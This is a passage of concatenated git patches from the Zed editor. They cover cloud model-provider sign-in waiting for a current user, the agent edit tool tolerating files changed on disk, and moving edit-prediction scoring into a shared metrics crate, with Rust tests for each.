N/A --- Cargo.lock | 3 + crates/language_models/Cargo.toml | 7 + crates/language_models/src/provider/cloud.rs | 239 ++++++++++++++++++- 3 files changed, 246 insertions(+), 3 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 383f5e2b9906e2..ecd69e00070657 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -9618,6 +9618,7 @@ dependencies = [ "base64 0.22.1", "bedrock", "client", + "clock", "cloud_api_client", "cloud_api_types", "collections", @@ -9627,9 +9628,11 @@ dependencies = [ "copilot_chat", "copilot_ui", "credentials_provider", + "db", "deepseek", "extension", "extension_host", + "feature_flags", "fs", "futures 0.3.32", "google_ai", diff --git a/crates/language_models/Cargo.toml b/crates/language_models/Cargo.toml index 8e0216ba6c83c7..7afcbb8aea109b 100644 --- a/crates/language_models/Cargo.toml +++ b/crates/language_models/Cargo.toml @@ -64,5 +64,12 @@ util.workspace = true x_ai = { workspace = true, features = ["schemars"] } [dev-dependencies] +client = { workspace = true, features = ["test-support"] } +clock = { workspace = true, features = ["test-support"] } +db = { workspace = true, features = ["test-support"] } +feature_flags.workspace = true +gpui = { workspace = true, features = ["test-support"] } +http_client = { workspace = true, features = ["test-support"] } language_model = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true +settings = { workspace = true, features = ["test-support"] } diff --git a/crates/language_models/src/provider/cloud.rs b/crates/language_models/src/provider/cloud.rs index 1c4de9e1afa4d8..0dae88fc3072e3 100644 --- a/crates/language_models/src/provider/cloud.rs +++ b/crates/language_models/src/provider/cloud.rs @@ -4,6 +4,7 @@ use client::{Client, RefreshLlmTokenListener, UserStore, global_llm_token, zed_u use cloud_api_client::LlmApiToken; use cloud_api_types::OrganizationId; use cloud_api_types::Plan; +use futures::FutureExt; use futures::StreamExt; use futures::future::BoxFuture; use gpui::{AnyElement, AnyView, App, AppContext, Context, Entity, Subscription, Task}; @@ -147,11 +148,17 @@ impl State { self.user_store.read(cx).current_user().is_none() } - fn authenticate(&self, cx: &mut Context) -> Task> { + fn sign_in(&self, cx: &mut Context) -> Task> { let client = self.client.clone(); + let mut current_user = self.user_store.read(cx).watch_current_user(); cx.spawn(async move |state, cx| { client.sign_in_with_optional_connect(true, cx).await?; - state.update(cx, |_, cx| cx.notify()) + while current_user.borrow().is_none() { + current_user.next().await; + } + state.update(cx, |_, cx| { + cx.notify(); + }) }) } @@ -253,7 +260,11 @@ impl LanguageModelProvider for CloudLanguageModelProvider { } fn authenticate(&self, cx: &mut App) -> Task> { + if self.is_authenticated(cx) { + return Task::ready(Ok(())); + } let mut status = self.state.read(cx).client.status(); + let mut current_user = self.state.read(cx).user_store.read(cx).watch_current_user(); if !status.borrow().is_signing_in() { return Task::ready(Ok(())); } @@ -261,6 +272,23 @@ impl LanguageModelProvider for CloudLanguageModelProvider { while status.borrow().is_signing_in() { status.next().await; } + while current_user.borrow().is_none() { + let current_status = *status.borrow(); + if !matches!( + current_status, + client::Status::Authenticated + | client::Status::Reauthenticated + | client::Status::Connected { .. } + ) { + return Err(AuthenticateError::Other(anyhow::anyhow!( + "sign-in did not complete: {current_status:?}" + ))); + } + futures::select_biased! { + _ = current_user.next().fuse() => {}, + _ = status.next().fuse() => {}, + } + } Ok(()) }) } @@ -387,7 +415,7 @@ impl ConfigurationView { let state = state.clone(); move |_window: &mut Window, cx: &mut App| { state.update(cx, |state, cx| { - state.authenticate(cx).detach_and_log_err(cx); + state.sign_in(cx).detach_and_log_err(cx); }); } }); @@ -419,6 +447,211 @@ impl Render for ConfigurationView { } } +#[cfg(test)] +mod tests { + use super::*; + use client::{Credentials, test::make_get_authenticated_user_response}; + use clock::FakeSystemClock; + use feature_flags::FeatureFlagAppExt as _; + use gpui::TestAppContext; + use http_client::{FakeHttpClient, Method, Response}; + use std::sync::{ + Arc, Mutex, + atomic::{AtomicUsize, Ordering}, + }; + + const TEST_USER_ID: u64 = 42; + + fn init_test(cx: &mut App) -> (Arc, Entity, CloudLanguageModelProvider) { + let settings_store = SettingsStore::test(cx); + cx.set_global(settings_store); + cx.set_global(db::AppDatabase::test_new()); + let app_version = AppVersion::global(cx); + release_channel::init_test(app_version, release_channel::ReleaseChannel::Dev, cx); + gpui_tokio::init(cx); + cx.update_flags(false, Vec::new()); + + let client = Client::new( + Arc::new(FakeSystemClock::new()), + FakeHttpClient::with_404_response(), + cx, + ); + let user_store = cx.new(|cx| UserStore::new(client.clone(), cx)); + RefreshLlmTokenListener::register(client.clone(), user_store.clone(), cx); + let provider = CloudLanguageModelProvider::new(user_store.clone(), client.clone(), cx); + + (client, user_store, provider) + } + + fn override_authenticate( + client: &Arc, + authenticate_rx: futures::channel::oneshot::Receiver>, + ) { + let authenticate_rx = Arc::new(Mutex::new(Some(authenticate_rx))); + client.override_authenticate(move |cx| { + let authenticate_rx = authenticate_rx.clone(); + cx.background_spawn(async move { + let authenticate_rx = authenticate_rx + .lock() + .expect("authenticate receiver lock poisoned") + .take() + .expect("authenticate receiver already used"); + authenticate_rx.await? + }) + }); + } + + fn respond_to_authenticated_user_after( + client: &Arc, + authenticated_user_rx: futures::channel::oneshot::Receiver<()>, + ) { + let authenticated_user_rx = Arc::new(Mutex::new(Some(authenticated_user_rx))); + client + .http_client() + .as_fake() + .replace_handler(move |old_handler, request| { + let authenticated_user_rx = authenticated_user_rx.clone(); + async move { + if request.method() == Method::GET && request.uri().path() == "/client/users/me" + { + let authenticated_user_rx = authenticated_user_rx + .lock() + .expect("authenticated user receiver lock poisoned") + .take(); + if let Some(authenticated_user_rx) = authenticated_user_rx { + authenticated_user_rx.await.ok(); + } + + return Ok(Response::builder() + .status(200) + .body( + serde_json::to_string(&make_get_authenticated_user_response( + TEST_USER_ID as i32, + format!("user-{TEST_USER_ID}"), + )) + .expect("failed to serialize authenticated user response") + .into(), + ) + .expect("failed to build authenticated user response")); + } + + old_handler(request).await + } + }); + } + + async fn sign_in_until_authenticating( + client: Arc, + cx: &mut TestAppContext, + ) -> Task> { + let mut status = client.status(); + let sign_in_task = cx.update(|cx| { + cx.spawn({ + let client = client.clone(); + async move |cx| client.sign_in(false, cx).await + }) + }); + + while !status.borrow().is_signing_in() { + status.next().await; + } + + sign_in_task + } + + #[gpui::test] + async fn provider_authenticate_does_not_start_sign_in_when_signed_out(cx: &mut TestAppContext) { + let (client, _user_store, provider) = cx.update(init_test); + let authenticate_calls = Arc::new(AtomicUsize::new(0)); + client.override_authenticate({ + let authenticate_calls = authenticate_calls.clone(); + move |_| { + authenticate_calls.fetch_add(1, Ordering::SeqCst); + Task::ready(Err(anyhow::anyhow!( + "provider authenticate should not start sign-in" + ))) + } + }); + + assert!(!cx.read(|cx| provider.is_authenticated(cx))); + assert!(matches!( + *client.status().borrow(), + client::Status::SignedOut + )); + + cx.update(|cx| provider.authenticate(cx)) + .now_or_never() + .expect("authenticate should return immediately when signed out") + .expect("authenticate should not fail when no sign-in is in progress"); + cx.executor().run_until_parked(); + + assert_eq!(authenticate_calls.load(Ordering::SeqCst), 0); + assert!(matches!( + *client.status().borrow(), + client::Status::SignedOut + )); + assert!(!cx.read(|cx| provider.is_authenticated(cx))); + } + + #[gpui::test] + async fn provider_authenticate_waits_for_current_user(cx: &mut TestAppContext) { + let (client, _user_store, provider) = cx.update(init_test); + let (authenticate_tx, authenticate_rx) = futures::channel::oneshot::channel(); + let (authenticated_user_tx, authenticated_user_rx) = futures::channel::oneshot::channel(); + override_authenticate(&client, authenticate_rx); + respond_to_authenticated_user_after(&client, authenticated_user_rx); + + let sign_in_task = sign_in_until_authenticating(client.clone(), cx).await; + let authenticate_task = cx.update(|cx| provider.authenticate(cx)); + authenticate_tx + .send(Ok(Credentials { + user_id: TEST_USER_ID, + access_token: "token".to_string(), + })) + .expect("authenticate receiver dropped"); + + cx.executor().run_until_parked(); + assert!(!cx.read(|cx| provider.is_authenticated(cx))); + + authenticated_user_tx + .send(()) + .expect("authenticated user receiver dropped"); + sign_in_task + .await + .expect("sign-in should complete after user response"); + authenticate_task + .await + .expect("provider authentication should complete after current user is populated"); + assert!(cx.read(|cx| provider.is_authenticated(cx))); + + cx.update(|cx| provider.authenticate(cx)) + .now_or_never() + .expect("already-authenticated provider should authenticate immediately") + .unwrap(); + } + + #[gpui::test] + async fn provider_authenticate_returns_error_when_sign_in_fails(cx: &mut TestAppContext) { + let (client, _user_store, provider) = cx.update(init_test); + let (authenticate_tx, authenticate_rx) = futures::channel::oneshot::channel(); + override_authenticate(&client, authenticate_rx); + + let sign_in_task = sign_in_until_authenticating(client.clone(), cx).await; + let authenticate_task = cx.update(|cx| provider.authenticate(cx)); + authenticate_tx + .send(Err(anyhow::anyhow!("test authentication failed"))) + .expect("authenticate receiver dropped"); + + sign_in_task + .await + .expect_err("sign-in should report authentication failure"); + let error = authenticate_task + .await + .expect_err("provider authentication should fail when sign-in fails"); + assert!(error.to_string().contains("AuthenticationError")); + } +} + impl Component for ZedAiConfiguration { fn name() -> &'static str { "AI Configuration Content" From bf871308c4d5dea126f619d3665616662e9d6955 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 4 May 2026 10:54:20 +0200 Subject: [PATCH 149/231] agent: Do not fail if buffer has changed on disk (#55606) Previously, we would always return an error if the LLM attempted to edit a file that had been modified on disk or by the user in the meantime. However, this often led to unnecessary failures and slowdowns. So, instead of failing every time, we now attempt to resolve a match. If we don't find one, we return an error to inform the LLM that the file has been modified since the last read. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - agent: Do not fail edit tool if file has unsaved changes --- .../src/tools/streaming_edit_file_tool.rs | 138 +++++++++++++++--- 1 file changed, 119 insertions(+), 19 deletions(-) diff --git a/crates/agent/src/tools/streaming_edit_file_tool.rs b/crates/agent/src/tools/streaming_edit_file_tool.rs index 4cd08b2311a2ef..7d229e1f53fa73 100644 --- a/crates/agent/src/tools/streaming_edit_file_tool.rs +++ b/crates/agent/src/tools/streaming_edit_file_tool.rs @@ -603,6 +603,7 @@ pub struct EditSession { mode: StreamingEditFileMode, parser: ToolEditParser, pipeline: EditPipeline, + file_changed_since_last_read: bool, _finalize_diff_guard: Deferred>, } @@ -674,7 +675,7 @@ impl EditSession { .await .map_err(|e| e.to_string())?; - ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; + let file_changed_since_last_read = ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); event_stream.update_diff(diff.clone()); @@ -708,6 +709,7 @@ impl EditSession { mode, parser: ToolEditParser::default(), pipeline: EditPipeline::new(), + file_changed_since_last_read, _finalize_diff_guard: finalize_diff_guard, }) } @@ -868,7 +870,13 @@ impl EditSession { if !chunk.is_empty() { matcher.push(chunk, None); } - let range = extract_match(matcher.finish(), &self.buffer, edit_index, cx)?; + let range = extract_match( + matcher.finish(), + &self.buffer, + edit_index, + self.file_changed_since_last_read, + cx, + )?; let anchor_range = self .buffer @@ -1045,14 +1053,21 @@ fn extract_match( matches: Vec>, buffer: &Entity, edit_index: &usize, + file_changed_since_last_read: bool, cx: &mut AsyncApp, ) -> Result, String> { + let file_changed_since_last_read_message = if file_changed_since_last_read { + " The file has changed on disk since you last read it." + } else { + "" + }; + match matches.len() { 0 => Err(format!( "Could not find matching text for edit at index {}. \ - The old_text did not match any content in the file. \ + The old_text did not match any content in the file.{} \ Please read the file again to get the current content.", - edit_index, + edit_index, file_changed_since_last_read_message, )), 1 => Ok(matches.into_iter().next().unwrap()), _ => { @@ -1099,7 +1114,7 @@ fn ensure_buffer_saved( abs_path: &PathBuf, tool: &StreamingEditFileTool, cx: &mut AsyncApp, -) -> Result<(), String> { +) -> Result { let last_read_mtime = tool .action_log .read_with(cx, |log, _| log.file_read_time(abs_path)); @@ -1115,7 +1130,7 @@ fn ensure_buffer_saved( }); let Ok((current_mtime, is_dirty, has_save_tool, has_restore_tool)) = check_result else { - return Ok(()); + return Ok(false); }; if is_dirty { @@ -1143,15 +1158,13 @@ fn ensure_buffer_saved( return Err(message.to_string()); } - if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) { - if current != last_read { - return Err("The file has been modified since you last read it. \ - Please read the file again to get the current state before editing it." - .to_string()); - } + if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) + && current != last_read + { + return Ok(true); } - Ok(()) + Ok(false) } fn resolve_path( @@ -3316,7 +3329,7 @@ mod tests { } #[gpui::test] - async fn test_streaming_external_modification_detected(cx: &mut TestAppContext) { + async fn test_streaming_external_modification_matching_edit_succeeds(cx: &mut TestAppContext) { let (tool, project, action_log, fs, _thread) = setup_test(cx, json!({"test.txt": "original content"})).await; let read_tool = Arc::new(crate::ReadFileTool::new( @@ -3368,7 +3381,6 @@ mod tests { cx.executor().run_until_parked(); - // Try to edit - should fail because file was modified externally let result = cx .update(|cx| { tool.clone().run( @@ -3386,6 +3398,91 @@ mod tests { cx, ) }) + .await + .unwrap(); + + let StreamingEditFileToolOutput::Success { + new_text, + input_path, + .. + } = result + else { + panic!("expected success"); + }; + + assert_eq!(new_text, "new content"); + assert_eq!(input_path, PathBuf::from("root/test.txt")); + } + + #[gpui::test] + async fn test_streaming_external_modification_mentioned_when_match_fails( + cx: &mut TestAppContext, + ) { + let (tool, project, action_log, fs, _thread) = + setup_test(cx, json!({"test.txt": "original content"})).await; + let read_tool = Arc::new(crate::ReadFileTool::new( + project.clone(), + action_log.clone(), + true, + )); + + cx.update(|cx| { + read_tool.clone().run( + ToolInput::resolved(crate::ReadFileToolInput { + path: "root/test.txt".to_string(), + start_line: None, + end_line: None, + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await + .unwrap(); + + cx.background_executor + .advance_clock(std::time::Duration::from_secs(2)); + fs.save( + path!("/root/test.txt").as_ref(), + &"externally modified content".into(), + language::LineEnding::Unix, + ) + .await + .unwrap(); + + let project_path = project + .read_with(cx, |project, cx| { + project.find_project_path("root/test.txt", cx) + }) + .expect("Should find project path"); + let buffer = project + .update(cx, |project, cx| project.open_buffer(project_path, cx)) + .await + .unwrap(); + buffer + .update(cx, |buffer, cx| buffer.reload(cx)) + .await + .unwrap(); + + cx.executor().run_until_parked(); + + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit after external change".into(), + path: "root/test.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "original content".into(), + new_text: "new content".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) .await; let StreamingEditFileToolOutput::Error { @@ -3398,12 +3495,15 @@ mod tests { }; assert!( - error.contains("has been modified since you last read it"), - "Error should mention file modification, got: {}", - error + error.contains("Could not find matching text for edit at index 0"), + "Error should mention failed match, got: {error}" + ); + assert!( + error.contains("has changed on disk since you last read it"), + "Error should mention possible disk change, got: {error}" ); assert!(diff.is_empty()); - assert!(input_path.is_none()); + assert_eq!(input_path, Some(PathBuf::from("root/test.txt"))); } #[gpui::test] From 3d5b9a17bece1f1b535edb77c16592617a894561 Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Mon, 4 May 2026 12:53:36 +0300 Subject: [PATCH 150/231] ep: Move scores aggegation to edit_prediction_metrics (#55609) This way, it can be shared with Python bindings. Release Notes: - N/A --- crates/edit_prediction_cli/src/example.rs | 70 +-- crates/edit_prediction_cli/src/main.rs | 1 - crates/edit_prediction_cli/src/metrics.rs | 10 +- .../src/reversal_tracking.rs | 17 - crates/edit_prediction_cli/src/score.rs | 525 ++---------------- .../src/edit_prediction_metrics.rs | 7 + .../src/prediction_score.rs | 319 +++++++++++ crates/edit_prediction_metrics/src/summary.rs | 293 ++++++++++ 8 files changed, 674 insertions(+), 568 deletions(-) delete mode 100644 crates/edit_prediction_cli/src/reversal_tracking.rs create mode 100644 crates/edit_prediction_metrics/src/prediction_score.rs create mode 100644 crates/edit_prediction_metrics/src/summary.rs diff --git a/crates/edit_prediction_cli/src/example.rs b/crates/edit_prediction_cli/src/example.rs index 516f77ce2cbe61..0b5a75260fcf1a 100644 --- a/crates/edit_prediction_cli/src/example.rs +++ b/crates/edit_prediction_cli/src/example.rs @@ -1,5 +1,4 @@ use crate::PredictionProvider; -use crate::metrics::ClassificationMetrics; use crate::paths::WORKTREES_DIR; use crate::qa::QaResult; use anyhow::{Context as _, Result}; @@ -149,74 +148,7 @@ where Ok(opt.unwrap_or_default()) } -#[derive(Clone, Debug, Serialize, Deserialize)] -pub struct ExampleScore { - pub delta_chr_f: f32, - #[serde(default)] - pub delta_chr_f_true_positives: usize, - #[serde(default)] - pub delta_chr_f_false_positives: usize, - #[serde(default)] - pub delta_chr_f_false_negatives: usize, - #[serde(default)] - pub delta_chr_f_precision: f64, - #[serde(default)] - pub delta_chr_f_recall: f64, - #[serde(default)] - pub delta_chr_f_beta: f64, - pub braces_disbalance: usize, - #[serde(default)] - pub exact_lines_tp: usize, - #[serde(default)] - pub exact_lines_fp: usize, - #[serde(default)] - pub exact_lines_fn: usize, - #[serde(default)] - pub reversal_ratio: f32, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub cursor_distance: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub cursor_exact_match: Option, - pub wrong_editable_region: Option, - #[serde(default)] - pub has_isolated_whitespace_changes: bool, - #[serde(default)] - pub inserted_tokens: usize, - #[serde(default)] - pub deleted_tokens: usize, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub kept_rate: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub recall_rate: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub kept_chars: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub correctly_deleted_chars: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub discarded_chars: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub cumulative_logprob: Option, - #[serde(default, skip_serializing_if = "Option::is_none")] - pub avg_logprob: Option, -} - -impl ExampleScore { - pub fn delta_chr_f_counts(&self) -> ClassificationMetrics { - ClassificationMetrics { - true_positives: self.delta_chr_f_true_positives, - false_positives: self.delta_chr_f_false_positives, - false_negatives: self.delta_chr_f_false_negatives, - } - } - - pub fn exact_lines_counts(&self) -> ClassificationMetrics { - ClassificationMetrics { - true_positives: self.exact_lines_tp, - false_positives: self.exact_lines_fp, - false_negatives: self.exact_lines_fn, - } - } -} +pub type ExampleScore = edit_prediction_metrics::PredictionScore; impl Example { pub fn repo_name(&self) -> Result> { diff --git a/crates/edit_prediction_cli/src/main.rs b/crates/edit_prediction_cli/src/main.rs index 0ab16690e6c8ae..e15a65a5980166 100644 --- a/crates/edit_prediction_cli/src/main.rs +++ b/crates/edit_prediction_cli/src/main.rs @@ -19,7 +19,6 @@ mod qa; mod reorder_patch; mod repair; mod retrieve_context; -mod reversal_tracking; mod score; mod split_commit; mod split_dataset; diff --git a/crates/edit_prediction_cli/src/metrics.rs b/crates/edit_prediction_cli/src/metrics.rs index 916d1498e6e1ae..4bb8f22e2de694 100644 --- a/crates/edit_prediction_cli/src/metrics.rs +++ b/crates/edit_prediction_cli/src/metrics.rs @@ -1,7 +1,5 @@ #![allow(unused_imports)] -use crate::example::ActualCursor; - pub use edit_prediction_metrics::ClassificationMetrics; pub use edit_prediction_metrics::Counts; pub use edit_prediction_metrics::DeltaChrFMetrics; @@ -14,11 +12,5 @@ pub use edit_prediction_metrics::delta_chr_f; pub use edit_prediction_metrics::delta_chr_f_beta; pub use edit_prediction_metrics::exact_lines_match; pub use edit_prediction_metrics::extract_changed_lines_from_diff; +pub use edit_prediction_metrics::has_isolated_whitespace_changes; pub use edit_prediction_metrics::is_editable_region_correct; - -pub fn has_isolated_whitespace_changes(patch_str: &str, cursor: Option<&ActualCursor>) -> bool { - edit_prediction_metrics::has_isolated_whitespace_changes( - patch_str, - cursor.map(|cursor| cursor.row), - ) -} diff --git a/crates/edit_prediction_cli/src/reversal_tracking.rs b/crates/edit_prediction_cli/src/reversal_tracking.rs deleted file mode 100644 index 58d52ed84e6eb8..00000000000000 --- a/crates/edit_prediction_cli/src/reversal_tracking.rs +++ /dev/null @@ -1,17 +0,0 @@ -use std::path::Path; - -use zeta_prompt::ZetaPromptInput; - -pub fn compute_prediction_reversal_ratio( - prompt_inputs: &ZetaPromptInput, - predicted_content: &str, - cursor_path: &Path, -) -> f32 { - edit_prediction_metrics::compute_prediction_reversal_ratio_from_history( - prompt_inputs.cursor_excerpt.as_ref(), - &prompt_inputs.events, - prompt_inputs.excerpt_start_row, - predicted_content, - cursor_path, - ) -} diff --git a/crates/edit_prediction_cli/src/score.rs b/crates/edit_prediction_cli/src/score.rs index 5e7721e84f7892..48ce081f42942b 100644 --- a/crates/edit_prediction_cli/src/score.rs +++ b/crates/edit_prediction_cli/src/score.rs @@ -1,22 +1,21 @@ use crate::{ PredictArgs, PredictionProvider, - example::{ActualCursor, Example, ExampleScore}, + example::Example, format_prompt::TeacherPrompt, headless::EpAppState, - metrics, parse_output::parse_prediction_output, predict::run_prediction, progress::{ExampleProgress, Step}, - reversal_tracking, }; use anyhow::Context as _; +use edit_prediction_metrics::{ + ActualPredictionCursor, PredictionReversalContext, PredictionScoringInput, +}; use gpui::AsyncApp; -use serde::Serialize; use std::fs::File; use std::io::BufWriter; use std::path::Path; use std::sync::Arc; -use zeta_prompt::udiff::{apply_diff_to_string, apply_diff_to_string_with_hunk_offset}; pub async fn run_scoring( example: &mut Example, @@ -37,18 +36,6 @@ pub async fn run_scoring( let original_text: &str = prompt_inputs.cursor_excerpt.as_ref(); let expected_patches_with_cursors = example.spec.expected_patches_with_cursor_positions(); - let expected_texts: Vec = expected_patches_with_cursors - .iter() - .map(|(patch, _)| { - apply_diff_to_string(patch, original_text) - .with_context(|| format!("Expected patch did not apply for {}", example.spec.name)) - }) - .collect::, _>>()?; - - // For Teacher prompts, we need to extract the editable region to properly compute cursor offsets. - // The actual_cursor_offset from Teacher is relative to the editable region, while the expected - // cursor from the patch is relative to the hunk. We need to apply the patch to the editable - // region to find where the hunk matched, then compute the expected cursor position. let old_editable_region = if let Some(p) = example.prompt.as_ref() { if matches!( p.provider, @@ -65,33 +52,12 @@ pub async fn run_scoring( None }; - let zero_scores = ExampleScore { - delta_chr_f: 0.0, - delta_chr_f_true_positives: 0, - delta_chr_f_false_positives: 0, - delta_chr_f_false_negatives: 0, - delta_chr_f_precision: 0.0, - delta_chr_f_recall: 0.0, - delta_chr_f_beta: metrics::delta_chr_f_beta(), - braces_disbalance: 0, - exact_lines_tp: 0, - exact_lines_fp: 0, - exact_lines_fn: 0, - reversal_ratio: 0.0, - cursor_distance: None, - cursor_exact_match: None, - wrong_editable_region: None, - has_isolated_whitespace_changes: false, - inserted_tokens: 0, - deleted_tokens: 0, - kept_rate: None, - recall_rate: None, - kept_chars: None, - correctly_deleted_chars: None, - discarded_chars: None, - cumulative_logprob: None, - avg_logprob: None, - }; + let prepared_expected_patches = edit_prediction_metrics::prepare_expected_patches( + &expected_patches_with_cursors, + original_text, + old_editable_region.as_deref(), + ) + .with_context(|| format!("Expected patch did not apply for {}", example.spec.name))?; let cursor_path = example.spec.cursor_path.as_ref(); @@ -104,162 +70,36 @@ pub async fn run_scoring( .map(|(patch, _)| patch) }); - let Some(actual_patch) = actual_patch else { - scores.push(zero_scores.clone()); - continue; - }; - - let token_changes = metrics::count_patch_token_changes(&actual_patch); - - let actual_text = match apply_diff_to_string(&actual_patch, original_text) { - Ok(text) => text, - Err(_) => { - let mut s = zero_scores.clone(); - s.inserted_tokens = token_changes.inserted_tokens; - s.deleted_tokens = token_changes.deleted_tokens; - scores.push(s); - continue; - } - }; - - let mut best_delta_chr_f_metrics = metrics::DeltaChrFMetrics::default(); - let mut best_expected_cursor: Option = None; - let mut best_patch_idx: Option = None; - let mut best_expected_text: Option<&str> = None; - - for (idx, expected) in expected_texts.iter().enumerate() { - let delta_chr_f_metrics = metrics::delta_chr_f(original_text, expected, &actual_text); - if delta_chr_f_metrics.score > best_delta_chr_f_metrics.score { - best_delta_chr_f_metrics = delta_chr_f_metrics; - best_patch_idx = Some(idx); - best_expected_text = Some(expected); - } - } - - if let Some(idx) = best_patch_idx { - // Get the raw cursor offset from the expected patch (relative to hunk new text) - let expected_cursor_in_patch = expected_patches_with_cursors - .get(idx) - .and_then(|(_, cursor)| *cursor); - - // For Teacher prompts, we need to apply the patch to the editable region - // to find where the hunk matched, then compute the actual cursor position - if let (Some(editable_region), Some(cursor_in_patch)) = - (&old_editable_region, expected_cursor_in_patch) - { - let (patch, _) = &expected_patches_with_cursors[idx]; - if let Ok((_, hunk_offset)) = - apply_diff_to_string_with_hunk_offset(patch, editable_region) - { - let hunk_start = hunk_offset.unwrap_or(0); - best_expected_cursor = Some(hunk_start + cursor_in_patch); - } - } else { - // For non-Teacher prompts or if we can't compute, use raw offset - best_expected_cursor = expected_cursor_in_patch; - } - } - - let disbalance_before = metrics::braces_disbalance(&original_text); - let disbalance_after = metrics::braces_disbalance(&actual_text); - let braces_disbalance = disbalance_after.saturating_sub(disbalance_before); - - // Compute exact lines match against best matching expected patch - let best_exact_lines = expected_patches_with_cursors - .iter() - .map(|(expected_patch, _)| metrics::exact_lines_match(expected_patch, &actual_patch)) - .max_by_key(|m| m.true_positives) - .unwrap_or_default(); - - // Compute reversal ratio - let reversal_ratio = reversal_tracking::compute_prediction_reversal_ratio( - prompt_inputs, - &actual_text, - cursor_path, - ); - - // Compute cursor position metrics - let (cursor_distance, cursor_exact_match) = - compute_cursor_metrics(best_expected_cursor, prediction.actual_cursor.as_ref()); - - // Compute approximation of editable region correctness - let wrong_editable_region = Some(!metrics::is_editable_region_correct(&actual_patch)); - - // Check for isolated whitespace changes. - let has_isolated_whitespace_changes = metrics::has_isolated_whitespace_changes( - &actual_patch, - prediction.actual_cursor.as_ref(), - ); - - let (kept_rate, recall_rate, kept_chars, correctly_deleted_chars, discarded_chars) = - best_expected_text - .map(|reference_text| { - let result = - metrics::compute_kept_rate(original_text, &actual_text, reference_text); - ( - Some(result.kept_rate), - Some(result.recall_rate), - Some(result.kept_chars), - Some(result.correctly_deleted_chars), - Some(result.discarded_chars), - ) - }) - .unwrap_or((None, None, None, None, None)); - - scores.push(ExampleScore { - delta_chr_f: best_delta_chr_f_metrics.score as f32, - delta_chr_f_true_positives: best_delta_chr_f_metrics.counts.true_positives, - delta_chr_f_false_positives: best_delta_chr_f_metrics.counts.false_positives, - delta_chr_f_false_negatives: best_delta_chr_f_metrics.counts.false_negatives, - delta_chr_f_precision: best_delta_chr_f_metrics.precision, - delta_chr_f_recall: best_delta_chr_f_metrics.recall, - delta_chr_f_beta: best_delta_chr_f_metrics.beta, - braces_disbalance, - exact_lines_tp: best_exact_lines.true_positives, - exact_lines_fp: best_exact_lines.false_positives, - exact_lines_fn: best_exact_lines.false_negatives, - reversal_ratio, - cursor_distance, - cursor_exact_match, - wrong_editable_region, - has_isolated_whitespace_changes, - inserted_tokens: token_changes.inserted_tokens, - deleted_tokens: token_changes.deleted_tokens, - kept_rate, - recall_rate, - kept_chars, - correctly_deleted_chars, - discarded_chars, - cumulative_logprob: prediction.cumulative_logprob, - avg_logprob: prediction.avg_logprob, - }); + let actual_cursor = + prediction + .actual_cursor + .as_ref() + .map(|cursor| ActualPredictionCursor { + row: cursor.row, + editable_region_offset: cursor.editable_region_offset, + }); + + scores.push(edit_prediction_metrics::score_prediction( + PredictionScoringInput { + original_text, + expected_patches: &prepared_expected_patches, + actual_patch: actual_patch.as_deref(), + actual_cursor, + reversal_context: Some(PredictionReversalContext { + edit_history: &prompt_inputs.events, + excerpt_start_row: prompt_inputs.excerpt_start_row, + cursor_path, + }), + cumulative_logprob: prediction.cumulative_logprob, + avg_logprob: prediction.avg_logprob, + }, + )); } example.score = scores; Ok(()) } -fn compute_cursor_metrics( - expected_cursor_editable_region_offset: Option, - actual_cursor: Option<&ActualCursor>, -) -> (Option, Option) { - match (expected_cursor_editable_region_offset, actual_cursor) { - (Some(expected), Some(actual)) => { - let distance = expected.abs_diff(actual.editable_region_offset.unwrap_or_default()); - let exact_match = distance == 0; - (Some(distance), Some(exact_match)) - } - (None, None) => { - // Neither has cursor position - skip cursor scoring - (None, None) - } - (Some(_), None) | (None, Some(_)) => { - // Only one has cursor position - count as miss - (None, Some(false)) - } - } -} - pub fn print_report(examples: &[Example], verbose: bool) { const MAX_EXAMPLES_DEFAULT: usize = 20; use crate::metrics::ClassificationMetrics; @@ -633,286 +473,27 @@ fn truncate_name(name: &str, max_len: usize) -> String { } } -#[derive(Serialize)] -pub struct SummaryJson { - pub total_examples: usize, - pub avg_delta_chr_f: f32, - pub delta_chr_f_beta: f64, - pub delta_chr_f_true_positives: usize, - pub delta_chr_f_false_positives: usize, - pub delta_chr_f_false_negatives: usize, - pub delta_chr_f_precision: f64, - pub delta_chr_f_recall: f64, - pub avg_braces_disbalance: f32, - pub exact_lines_true_positives: usize, - pub exact_lines_false_positives: usize, - pub exact_lines_false_negatives: usize, - pub exact_lines_precision: f64, - pub exact_lines_recall: f64, - pub exact_lines_f1: f64, - pub avg_reversal_ratio: f32, - #[serde(skip_serializing_if = "Option::is_none")] - pub qa_avg_reverts_edits: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub qa_avg_confidence: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub cursor_exact_match_rate: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub cursor_avg_distance: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub 